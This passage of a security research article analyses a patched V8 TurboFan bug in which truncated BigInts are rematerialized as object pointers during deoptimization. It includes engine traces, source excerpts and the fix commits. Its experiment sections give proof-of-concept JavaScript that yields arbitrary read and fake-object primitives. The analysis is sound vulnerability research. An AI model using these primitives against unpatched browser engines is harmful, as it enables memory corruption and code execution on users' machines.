call 0x55807c02040       ;; lazy deoptimization bailout
// ...
REX.W movq r13,0x4       ;; debug: deopt position, script offset '44'
                         ;; debug: deopt position, inlining id '-1'
                         ;; debug: deopt reason 'wrong name'
                         ;; debug: deopt index 4
call 0x55807bc2040       ;; eager deoptimization bailout
nop

Interestingly (you'll need to also add the --code-comments flag), we can notice that the beginning of an native turbofan compiled function starts with a check for any required lazy deoptimization!

                  -- Prologue: check for deoptimization --
0x1332e5442b44    24  488b59e0       REX.W movq rbx,[rcx-0x20]
0x1332e5442b48    28  f6430f01       testb [rbx+0xf],0x1
0x1332e5442b4c    2c  740d           jz 0x1332e5442b5b  <+0x3b>
                  -- Inlined Trampoline to CompileLazyDeoptimizedCode --
0x1332e5442b4e    2e  49ba6096371501000000 REX.W movq r10,0x115379660  (CompileLazyDeoptimizedCode)    ;; off heap target
0x1332e5442b58    38  41ffe2         jmp r10

Now let's trace the actual deoptimization with --trace-deopt. We can see the deoptimization reason : wrong name. Because the feedback indicates that we always add a property named "x", TurboFan then speculates it will always be the case. Thus, executing optimized code with any different name will violate this assumption and trigger a deoptimization.

[deoptimizing (DEOPT eager): begin 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> (opt #0) @2, FP to SP delta: 24, caller sp: 0x7ffeeb82e3b0]
            ;;; deoptimize at <test.js:3:8>, wrong name

It displays the input frame.

  reading input frame add_prop => bytecode_offset=6, args=2, height=1, retval=0(#0); inputs:
      0: 0x0a6842edfa99 ;  [fp -  16]  0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)>
      1: 0x0a6876381579 ;  [fp +  24]  0x0a6876381579 <JSGlobal Object>
      2: 0x0a6842edf7a9 ; rdx 0x0a6842edf7a9 <String[#9]: different>
      3: 0x0a6842ec1831 ;  [fp -  24]  0x0a6842ec1831 <NativeContext[244]>
      4: captured object #0 (length = 7)
           0x0a68d4640439 ; (literal  3) 0x0a68d4640439 <Map(HOLEY_ELEMENTS)>
           0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
           0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
           0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
      5: 0x002a00000000 ; (literal  6) 42

The deoptimizer uses the translation at index 2 of deoptimization data.

     2                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               REGISTER {input=rdx}
                               STACK_SLOT {input=4}
                               CAPTURED_OBJECT {length=7}
                               LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=6 (42)}

And displays the translated interpreted frame.

  translating interpreted frame add_prop => bytecode_offset=6, variable_frame_size=16, frame_size=80
    0x7ffeeb82e3a8: [top +  72] <- 0x0a6876381579 <JSGlobal Object> ;  stack parameter (input #1)
    0x7ffeeb82e3a0: [top +  64] <- 0x0a6842edf7a9 <String[#9]: different> ;  stack parameter (input #2)
    -------------------------
    0x7ffeeb82e398: [top +  56] <- 0x000105d9e4d2 ;  caller's pc
    0x7ffeeb82e390: [top +  48] <- 0x7ffeeb82e3f0 ;  caller's fp
    0x7ffeeb82e388: [top +  40] <- 0x0a6842ec1831 <NativeContext[244]> ;  context (input #3)
    0x7ffeeb82e380: [top +  32] <- 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> ;  function (input #0)
    0x7ffeeb82e378: [top +  24] <- 0x0a6842edfbd1 <BytecodeArray[12]> ;  bytecode array
    0x7ffeeb82e370: [top +  16] <- 0x003b00000000 <Smi 59> ;  bytecode offset
    -------------------------
    0x7ffeeb82e368: [top +   8] <- 0x0a6893080c11 <Odd Oddball: arguments_marker> ;  stack parameter (input #4)
    0x7ffeeb82e360: [top +   0] <- 0x002a00000000 <Smi 42> ;  accumulator (input #5)

After that, it is ready to redirect the execution to the ignition interpreter.

[deoptimizing (eager): end 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> @2 => node=6, pc=0x000105d9e9a0, caller sp=0x7ffeeb82e3b0, took 2.698 ms]
Materialization [0x7ffeeb82e368] <- 0x0a6842ee0031 ;  0x0a6842ee0031 <Object map = 0xa68d4640439>

Case study : an incorrect BigInt rematerialization

Back to simplified lowering

Let's have a look at the way FrameState nodes are dealt with during the simplified lowering phase.

FrameState nodes expect 6 inputs :

parameters
- UseInfo is AnyTagged
registers
- UseInfo is AnyTagged
the accumulator
- UseInfo is Any
a context
- UseInfo is AnyTagged
a closure
- UseInfo is AnyTagged
the outer frame state
- UseInfo is AnyTagged

A FrameState has a tagged output representation.

  void VisitFrameState(Node* node) {
    DCHECK_EQ(5, node->op()->ValueInputCount());
    DCHECK_EQ(1, OperatorProperties::GetFrameStateInputCount(node->op()));

    ProcessInput(node, 0, UseInfo::AnyTagged());  // Parameters.
    ProcessInput(node, 1, UseInfo::AnyTagged());  // Registers.

    // Accumulator is a special flower - we need to remember its type in
    // a singleton typed-state-values node (as if it was a singleton
    // state-values node).
    if (propagate()) {
      EnqueueInput(node, 2, UseInfo::Any());
    } else if (lower()) {
      Zone* zone = jsgraph_->zone();
      Node* accumulator = node->InputAt(2);
      if (accumulator == jsgraph_->OptimizedOutConstant()) {
        node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
      } else {
        ZoneVector<MachineType>* types =
            new (zone->New(sizeof(ZoneVector<MachineType>)))
                ZoneVector<MachineType>(1, zone);
        (*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
                                         TypeOf(accumulator));

        node->ReplaceInput(
            2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                              types, SparseInputMask::Dense()),
                                          accumulator));
      }
    }

    ProcessInput(node, 3, UseInfo::AnyTagged());  // Context.
    ProcessInput(node, 4, UseInfo::AnyTagged());  // Closure.
    ProcessInput(node, 5, UseInfo::AnyTagged());  // Outer frame state.
    return SetOutput(node, MachineRepresentation::kTagged);
  }

An input node for which the use info is AnyTagged means this input is being used as a tagged value and that the truncation kind is any i.e. no truncation is required (although it may be required to distinguish between zeros).

An input node for which the use info is Any means the input is being used as any kind of value and that the truncation kind is any. No truncation is needed. The input representation is undetermined. That is the most generic case.

// The {UseInfo} class is used to describe a use of an input of a node. 

  static UseInfo AnyTagged() {
    return UseInfo(MachineRepresentation::kTagged, Truncation::Any());
  }
  // Undetermined representation.
  static UseInfo Any() {
    return UseInfo(MachineRepresentation::kNone, Truncation::Any());
  }
  // Value not used.
  static UseInfo None() {
    return UseInfo(MachineRepresentation::kNone, Truncation::None());
  }

const char* Truncation::description() const {
  switch (kind()) {
  // ...
    case TruncationKind::kAny:
      switch (identify_zeros()) {
        case TruncationKind::kNone:
          return "no-value-use";
        // ...
        case kIdentifyZeros:
          return "no-truncation (but identify zeros)";
        case kDistinguishZeros:
          return "no-truncation (but distinguish zeros)";
      }
  }
  // ...
}

If we trace the first phase of simplified lowering (truncation propagation), we'll get the following input :

 visit #46: FrameState (trunc: no-truncation (but distinguish zeros))
   queue #7?: no-truncation (but distinguish zeros)
  initial #45: no-truncation (but distinguish zeros)
   queue #71?: no-truncation (but distinguish zeros)
   queue #4?: no-truncation (but distinguish zeros)
   queue #62?: no-truncation (but distinguish zeros)
   queue #0?: no-truncation (but distinguish zeros)

All the inputs are added to the queue, no truncation is ever propagated. The node #71 corresponds to the accumulator since it is the 3rd input.

 visit #71: BigIntAsUintN (trunc: no-truncation (but distinguish zeros))
   queue #70?: no-value-use

In our example, the accumulator input is a BigIntAsUintN node. Such a node consumes an input which is a word64 and is truncated to a word64.

The astute reader will wonder what happens if this node returns a number that requires more than 64 bits. The answer lies in the inlining phase. Indeed, a JSCall to the BigInt.AsUintN builtin will be reduced to a BigIntAsUintN turbofan operator only in the case where TurboFan is guaranted that the requested width is of 64-bit a most.

This node outputs a word64 and has BigInt as a restriction type. During the type propagation phase, any type computed for a given node will be intersected with its restriction type.

      case IrOpcode::kBigIntAsUintN: {
        ProcessInput(node, 0, UseInfo::TruncatingWord64());
        SetOutput(node, MachineRepresentation::kWord64, Type::BigInt());
        return;
      }

So at this point (after the propagation phase and before the lowering phase), if we focus on the FrameState node and its accumulator input node (3rd input), we can say the following :

the FrameState's 2nd input expects MachineRepresentation::kNone (includes everything, especially kWord64)
the FrameState doesn't truncate its 2nd input
the BigIntAsUintN output representation is kWord64

Because the input 2 is used as Any (with a kNone representation), there won't ever be any conversion of the input node :

  // Converts input {index} of {node} according to given UseInfo {use},
  // assuming the type of the input is {input_type}. If {input_type} is null,
  // it takes the input from the input node {TypeOf(node->InputAt(index))}.
  void ConvertInput(Node* node, int index, UseInfo use,
                    Type input_type = Type::Invalid()) {
    Node* input = node->InputAt(index);
    // In the change phase, insert a change before the use if necessary.
    if (use.representation() == MachineRepresentation::kNone)
      return;  // No input requirement on the use.

So what happens during during the last phase of simplified lowering (the phase that lowers nodes and adds conversions)? If we look at the visitor of FrameState nodes, we can see that eventually the accumulator input may get replaced by a TypedStateValues node. The BigIntAsUintN node is now the input of the TypedStateValues node. No conversion of any kind is ever done.

  ZoneVector<MachineType>* types =
      new (zone->New(sizeof(ZoneVector<MachineType>)))
          ZoneVector<MachineType>(1, zone);
  (*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
                                   TypeOf(accumulator));

  node->ReplaceInput(
      2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                        types, SparseInputMask::Dense()),
                                    accumulator));

Also, the vector of MachineType is associated to the TypedStateValues. To compute the machine type, DeoptMachineTypeOf relies on the node's type.

In that case (a BigIntAsUintN node), the type will be Type::BigInt().

Type OperationTyper::BigIntAsUintN(Type type) {
  DCHECK(type.Is(Type::BigInt()));
  return Type::BigInt();
}

As we just saw, because for this node the output representation is kWord64 and the type is BigInt, the MachineType is MachineType::AnyTagged.

  static MachineType DeoptMachineTypeOf(MachineRepresentation rep, Type type) {
    // ..
    if (rep == MachineRepresentation::kWord64) {
      if (type.Is(Type::BigInt())) {
        return MachineType::AnyTagged();
      }
// ...
  }

So if we look at the sea of node right after the escape analysis phase and before the simplified lowering phase, it looks like this :

And after the simplified lowering phase, we can confirm that a TypedStateValues node was indeed inserted.

After effect control linearization, the BigIntAsUintN node gets lowered to a Word64And node.

As we learned earlier, the FrameState and TypedStateValues nodes do not directly correspond to any code generation.

void InstructionSelector::VisitNode(Node* node) {
  switch (node->opcode()) {
  // ...
    case IrOpcode::kFrameState:
    case IrOpcode::kStateValues:
    case IrOpcode::kObjectState:
      return;
  // ...

However, other nodes may make use of FrameState and TypedStateValues nodes. This is the case for instance of the various Deoptimize nodes and also Call nodes.

They will make the instruction selector build the necessary FrameStateDescriptor and StateValueList of StateValueDescriptor.

Using those structures, the code generator will then build the necessary DeoptimizationExits to which a Translation will be associated with. The function BuildTranslation will handle the the InstructionOperands in CodeGenerator::AddTranslationForOperand. And this is where the (AnyTagged) MachineType corresponding to the BigIntAsUintN node is used! When building the translation, we are using the BigInt value as if it was a pointer (second branch) and not a double value (first branch)!

void CodeGenerator::AddTranslationForOperand(Translation* translation,
                                             Instruction* instr,
                                             InstructionOperand* op,
                                             MachineType type) {      
  case Constant::kInt64:
        DCHECK_EQ(8, kSystemPointerSize);
        if (type.representation() == MachineRepresentation::kWord64) {
          literal =
              DeoptimizationLiteral(static_cast<double>(constant.ToInt64()));
        } else {
          // When pointers are 8 bytes, we can use int64 constants to represent
          // Smis.
          DCHECK_EQ(MachineRepresentation::kTagged, type.representation());
          Smi smi(static_cast<Address>(constant.ToInt64()));
          DCHECK(smi.IsSmi());
          literal = DeoptimizationLiteral(smi.value());
        }
        break;

This is very interesting because that means at runtime (when deoptimizing), the deoptimizer uses this pointer to rematerialize an object! But since this is a controlled value (the truncated big int), we can make the deoptimizer reference an arbitrary object and thus make the next ignition bytecode handler use (or not) this crafted reference.

In this case, we are playing with the accumulator register. Therefore, to find interesting primitives, what we need to do is to look for all the bytecode handlers that get the accumulator (using a GetAccumulator for instance).

Experiment 1 - reading an arbitrary heap number

The most obvious primitive is the one we get by deoptimizing to the ignition handler for add opcodes.

let addr = BigInt(0x11111111);

function setAddress(val) {
  addr = BigInt(val);
}

function f(x) {
  let y = BigInt.asUintN(49, addr);
  let a = 111;
  try {
    var res = 1.1 + y; // will trigger a deoptimization. reason : "Insufficient type feedback for binary operation"
    return res;
  }
  catch(_){ return y}
}

function compileOnce() {
  f({x:1.1});
  %PrepareFunctionForOptimization(f);
  f({x:1.1});
  %OptimizeFunctionOnNextCall(f);
  return f({x:1.1});
}

When reading the implementation of the handler (BinaryOpAssembler::Generate_AddWithFeedback in src/ic/bin-op-assembler.cc), we observe that for heap numbers additions, the code ends up calling the function LoadHeapNumberValue. In that case, it gets called with an arbitrary pointer.

To demonstrate the bug, we use the %DebugPrint runtime function to get the address of an object (simulate an infoleak primitive) and see that we indeed (incorrectly) read its value.

d8> var a = new Number(3.14); %DebugPrint(a)
0x025f585caa49 <Number map = 000000FB210820A1 value = 0x019d1cb1f631 <HeapNumber 3.14>>
3.14
d8> setAddress(0x025f585caa49)
undefined
d8> compileOnce()
4.24

We can get the same primitive using other kind of ignition bytecode handlers such as +, -,/,* or %.

--- var res = 1.1 + y;
+++ var res = y / 1;

d8> var a = new Number(3.14); %DebugPrint(a)
0x019ca5a8aa11 <Number map = 00000138F15420A1 value = 0x0168e8ddf611 <HeapNumber 3.14>>
3.14
d8> setAddress(0x019ca5a8aa11)
undefined
d8> compileOnce()
3.14

The --trace-ignition debugging utility can be interesting in this scenario. For instance, let's say we use a BigInt value of 0x4200000000 and instead of doing 1.1 + y we do y / 1. Then we want to trace it and confirm the behaviour that we expect.

The trace tells us :

a deoptimization was triggered and why (insufficient type feedback for binary operation, this binary operation being the division)
in the input frame, there is a register entry containing the bigint value thanks to (or because of) the incorrect lowering 11: 0x004200000000 ; rcx 66
in the translated interpreted frame the accumulator gets the value 0x004200000000 (<Smi 66>)
we deoptimize directly to the offset 39 which corresponds to DivSmi [1], [6]

[deoptimizing (DEOPT soft): begin 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> (opt #0) @3, FP to SP delta: 40, caller sp: 0x0042f87fde08]
            ;;; deoptimize at <read_heap_number.js:11:17>, Insufficient type feedback for binary operation
  reading input frame f => bytecode_offset=39, args=2, height=8, retval=0(#0); inputs:
      0: 0x01b141c5f5f1 ;  [fp -  16]  0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)>
      1: 0x03a35e2c1349 ;  [fp +  24]  0x03a35e2c1349 <JSGlobal Object>
      2: 0x03a35e2cb3b1 ;  [fp +  16]  0x03a35e2cb3b1 <Object map = 0000019FAF409DF1>
      3: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
      4: 0x03a35e2cb3d1 ; rdi 0x03a35e2cb3d1 <BigInt 283467841536>
      5: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      6: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      7: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
      8: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
      9: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
     10: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
     11: 0x004200000000 ; rcx 66
  translating interpreted frame f => bytecode_offset=39, height=64
    0x0042f87fde00: [top + 120] <- 0x03a35e2c1349 <JSGlobal Object> ;  stack parameter (input #1)
    0x0042f87fddf8: [top + 112] <- 0x03a35e2cb3b1 <Object map = 0000019FAF409DF1> ;  stack parameter (input #2)
    -------------------------
    0x0042f87fddf0: [top + 104] <- 0x7ffd93f64c1d ;  caller's pc
    0x0042f87fdde8: [top +  96] <- 0x0042f87fde38 ;  caller's fp
    0x0042f87fdde0: [top +  88] <- 0x01b141c5f551 <ScriptContext[5]> ;  context (input #3)
    0x0042f87fddd8: [top +  80] <- 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> ;  function (input #0)
    0x0042f87fddd0: [top +  72] <- 0x01b141c5fa41 <BytecodeArray[61]> ;  bytecode array
    0x0042f87fddc8: [top +  64] <- 0x005c00000000 <Smi 92> ;  bytecode offset
    -------------------------
    0x0042f87fddc0: [top +  56] <- 0x03a35e2cb3d1 <BigInt 283467841536> ;  stack parameter (input #4)
    0x0042f87fddb8: [top +  48] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #5)
    0x0042f87fddb0: [top +  40] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #6)
    0x0042f87fdda8: [top +  32] <- 0x01b141c5f551 <ScriptContext[5]> ;  stack parameter (input #7)
    0x0042f87fdda0: [top +  24] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #8)
    0x0042f87fdd98: [top +  16] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #9)
    0x0042f87fdd90: [top +   8] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #10)
    0x0042f87fdd88: [top +   0] <- 0x004200000000 <Smi 66> ;  accumulator (input #11)
[deoptimizing (soft): end 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> @3 => node=39, pc=0x7ffd93f65100, caller sp=0x0042f87fde08, took 2.328 ms]
 -> 000001B141C5FA9D @   39 : 43 01 06          DivSmi [1], [6]
      [ accumulator -> 66 ]
      [ accumulator <- 66 ]
 -> 000001B141C5FAA0 @   42 : 26 f9             Star r2
      [ accumulator -> 66 ]
      [          r2 <- 66 ]
 -> 000001B141C5FAA2 @   44 : a9                Return 
      [ accumulator -> 66 ]

Experiment 2 - getting an arbitrary object reference

This bug also gives a better, more powerful, primitive. Indeed, if instead of deoptimizing back to an add handler, we deoptimize to Builtins_StaKeyedPropertyHandler, we'll be able to store an arbitrary object reference in an object property. Therefore, if an attacker is also able to leverage an infoleak primitive, he would be able to craft any arbitrary object (these are sometimes referred to as addressof and fakeobj primitives) .

In order to deoptimize to this specific handler, aka deoptimize on obj[x] = y, we have to make this line do something that violates a speculation. If we repeatedly call the function f with the same property name, TurboFan will speculate that we're always gonna add the same property. Once the code is optimized, using a property with a different name will violate this assumption, call the deoptimizer and then redirect execution to the StaKeyedProperty handler.

let addr = BigInt(0x11111111);

function setAddress(val) {
  addr = BigInt(val);
}

function f(x) {
  let y = BigInt.asUintN(49, addr);
  let a = 111;
  try {
    var obj = {};
    obj[x] = y;
    return obj;
  }
  catch(_){ return y}
}

function compileOnce() {
  f("foo");
  %PrepareFunctionForOptimization(f);
  f("foo");
  f("foo");
  f("foo");
  f("foo");
  %OptimizeFunctionOnNextCall(f);
  f("foo");
  return f("boom"); // deopt reason : wrong name
}

To experiment, we simply simulate the infoleak primitive by simply using a runtime function %DebugPrint and adding an ArrayBuffer to the object. That should not be possible since the javascript code is actually adding a truncated BigInt.

d8> var a = new ArrayBuffer(8); %DebugPrint(a);
0x003d5ef8ab79 <ArrayBuffer map = 00000354B09C2191>
[object ArrayBuffer]
d8> setAddress(0x003d5ef8ab79)
undefined
d8> var badobj = compileOnce()
undefined
d8> %DebugPrint(badobj)
0x003d5ef8d159 <Object map = 00000354B09C9F81>
{boom: [object ArrayBuffer]}
d8> badobj.boom
[object ArrayBuffer]

~~Et voila!~~ Sweet as!

Variants

We saw with the first commit that the pattern affected FrameState nodes but also StateValues nodes.

Another commit further fixed the exact same bug affecting ObjectState nodes.

From 3ce6be027562ff6641977d7c9caa530c74a279ac Mon Sep 17 00:00:00 2001
From: Nico Hartmann <nicohartmann@chromium.org>
Date: Tue, 26 Nov 2019 13:17:45 +0100
Subject: [PATCH] [turbofan] Fixes crash caused by truncated bigint

Bug: chromium:1028191
Change-Id: Idfcd678b3826fb6238d10f1e4195b02be35c3010
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1936468
Commit-Queue: Nico Hartmann <nicohartmann@chromium.org>
Reviewed-by: Georg Neis <neis@chromium.org>
Cr-Commit-Position: refs/heads/master@{#65173}
---

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 4c000af..f271469 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1254,7 +1254,13 @@
   void VisitObjectState(Node* node) {
     if (propagate()) {
       for (int i = 0; i < node->InputCount(); i++) {
-        EnqueueInput(node, i, UseInfo::Any());
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          EnqueueInput(node, i, UseInfo::AnyTagged());
+        } else {
+          EnqueueInput(node, i, UseInfo::Any());
+        }
       }
     } else if (lower()) {
       Zone* zone = jsgraph_->zone();
@@ -1265,6 +1271,11 @@
         Node* input = node->InputAt(i);
         (*types)[i] =
             DeoptMachineTypeOf(GetInfo(input)->representation(), TypeOf(input));
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          ConvertInput(node, i, UseInfo::AnyTagged());
+        }
       }
       NodeProperties::ChangeOp(node, jsgraph_->common()->TypedObjectState(
                                          ObjectIdOf(node->op()), types));
diff --git a/test/mjsunit/regress/regress-1028191.js b/test/mjsunit/regress/regress-1028191.js
new file mode 100644
index 0000000..543028a
--- /dev/null
+++ b/test/mjsunit/regress/regress-1028191.js
@@ -0,0 +1,23 @@
+// Copyright 2019 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+"use strict";
+
+function f(a, b, c) {
+  let x = BigInt.asUintN(64, a + b);
+  try {
+    x + c;
+  } catch(_) {
+    eval();
+  }
+  return x;
+}
+
+%PrepareFunctionForOptimization(f);
+assertEquals(f(3n, 5n), 8n);
+assertEquals(f(8n, 12n), 20n);
+%OptimizeFunctionOnNextCall(f);
+assertEquals(f(2n, 3n), 5n);

Interestingly, other bugs in the representation changers got triggered by very similars PoCs. The fix simply adds a call to InsertConversion so as to insert a ChangeUint64ToBigInt node when necessary.

From 8aa588976a1c4e593f0074332f5b1f7020656350 Mon Sep 17 00:00:00 2001
From: Nico Hartmann <nicohartmann@chromium.org>
Date: Thu, 12 Dec 2019 10:06:19 +0100
Subject: [PATCH] [turbofan] Fixes rematerialization of truncated BigInts

Bug: chromium:1029530
Change-Id: I12aa4c238387f6a47bf149fd1a136ea83c385f4b
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1962278
Auto-Submit: Nico Hartmann <nicohartmann@chromium.org>
Commit-Queue: Georg Neis <neis@chromium.org>
Reviewed-by: Georg Neis <neis@chromium.org>
Cr-Commit-Position: refs/heads/master@{#65434}
---

diff --git a/src/compiler/representation-change.cc b/src/compiler/representation-change.cc
index 99b3d64..9478e15 100644
--- a/src/compiler/representation-change.cc
+++ b/src/compiler/representation-change.cc
@@ -175,6 +175,15 @@
     }
   }

+  // Rematerialize any truncated BigInt if user is not expecting a BigInt.
+  if (output_type.Is(Type::BigInt()) &&
+      output_rep == MachineRepresentation::kWord64 &&
+      use_info.type_check() != TypeCheckKind::kBigInt) {
+    node =
+        InsertConversion(node, simplified()->ChangeUint64ToBigInt(), use_node);
+    output_rep = MachineRepresentation::kTaggedPointer;
+  }
+
   switch (use_info.representation()) {
     case MachineRepresentation::kTaggedSigned:
       DCHECK(use_info.type_check() == TypeCheckKind::kNone ||
diff --git a/test/mjsunit/regress/regress-1029530.js b/test/mjsunit/regress/regress-1029530.js
new file mode 100644
index 0000000..918a9ec
--- /dev/null
+++ b/test/mjsunit/regress/regress-1029530.js
@@ -0,0 +1,40 @@
+// Copyright 2019 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax --interrupt-budget=1024
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,3n);
+    let i = 0;
+    while(i < 1) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}
+
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,10n);
+    let i = 0.1;
+    while(i < 1.8) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}

An inlining bug was also patched. Indeed, a call to BigInt.asUintN would get inlined even when no value argument is given (as in BigInt.asUintN(bits,no_value_argument_here)). Therefore a call to GetValueInput would be made on a non-existing input! The fix simply adds a check on the number of inputs.

Node* value = NodeProperties::GetValueInput(node, 3); // input 3 may not exist!

An interesting fact to point out is that none of those PoCs would actually correctly execute. They would trigger exceptions that need to get caught. This leads to interesting behaviours from TurboFan that optimizes 'invalid' code.

Digression on pointer compression

In our small experiments, we used standard tagged pointers. To distinguish small integers (Smis) from heap objects, V8 uses the lowest bit of an object address.

Up until V8 8.0, it looks like this :

Smi:                   [32 bits] [31 bits (unused)]  |  0
Strong HeapObject:                        [pointer]  | 01
Weak HeapObject:                          [pointer]  | 11

However, with V8 8.0 comes pointer compression. It is going to be shipped with the upcoming M80 stable release. Starting from this version, Smis and compressed pointers are stored as 32-bit values :

Smi:                                      [31 bits]  |  0
Strong HeapObject:                        [30 bits]  | 01
Weak HeapObject:                          [30 bits]  | 11

As described in the design document, a compressed pointer corresponds to the first 32-bits of a pointer to which we add a base address when decompressing.

Let's quickly have a look by inspecting the memory ourselves. Note that DebugPrint displays uncompressed pointers.

d8> var a = new Array(1,2,3,4)
undefined
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c5f61: [JSArray]
 - map: 0x16a4082817e9 <Map(PACKED_SMI_ELEMENTS)> [FastProperties]
 - prototype: 0x16a408248f25 <JSArray[0]>
 - elements: 0x16a4080c5f71 <FixedArray[4]> [PACKED_SMI_ELEMENTS]
 - length: 4
 - properties: 0x16a4080406e1 <FixedArray[0]> {
    #length: 0x16a4081c015d <AccessorInfo> (const accessor descriptor)
 }
 - elements: 0x16a4080c5f71 <FixedArray[4]> {
           0: 1
           1: 2
           2: 3
           3: 4
 }

If we look in memory, we'll actually find compressed pointers, which are 32-bit values.

(lldb) x/10wx 0x16a4080c5f61-1
0x16a4080c5f60: 0x082817e9 0x080406e1 0x080c5f71 0x00000008
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008

To get the full address, we need to know the base.

(lldb) register read r13
     r13 = 0x000016a400000000

And we can manually uncompress a pointer by doing base+compressed_pointer (and obviously we substract 1 to untag the pointer).

(lldb) x/10wx $r13+0x080c5f71-1
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008 0x08040549 0x39dc599e
0x16a4080c5f90: 0x00000adc 0x7566280a

Because now on a 64-bit build Smis are on 32-bits with the lsb set to 0, we need to shift their values by one.

Also, raw pointers are supported. An example of raw pointer is the backing store pointer of an array buffer.

d8> var a = new ArrayBuffer(0x40); 
d8> var v = new Uint32Array(a);
d8> v[0] = 0x41414141

d8> %DebugPrint(a)
DebugPrint: 0x16a4080c7899: [JSArrayBuffer]
 - map: 0x16a408281181 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x16a4082476f5 <Object map = 0x16a4082811a9>
 - elements: 0x16a4080406e1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 0x107314fd0
 - byte_length: 64
 - detachable
 - properties: 0x16a4080406e1 <FixedArray[0]> {}
 - embedder fields = {
    0, aligned pointer: 0x0
    0, aligned pointer: 0x0
 }

(lldb) x/10wx 0x16a4080c7899-1
0x16a4080c7898: 0x08281181 0x080406e1 0x080406e1 0x00000040
0x16a4080c78a8: 0x00000000 0x07314fd0 0x00000001 0x00000002
0x16a4080c78b8: 0x00000000 0x00000000

We indeed find the full raw pointer in memory (raw | 00).

(lldb) x/2wx 0x0000000107314fd0
0x107314fd0: 0x41414141 0x00000000

Conclusion

We went through various components of V8 in this article such as Ignition, TurboFan's simplified lowering phase as well as how deoptimization works. Understanding this is interesting because it allows us to grasp the actual underlying root cause of the bug we studied. At first, the base trigger looks very simple but it actually involves quite a few interesting mechanisms.

However, even though this bug gives a very interesting primitive, unfortunately it does not provide any good infoleak primitive. Therefore, it would need to be combined with another bug (obviously, we don't want to use any kind of heap spraying).

Special thanks to my mates Axel Souchet, Dougall J, Bill K, yrp604 and Mark Dowd for reviewing this article and kudos to the V8 team for building such an amazing JavaScript engine!

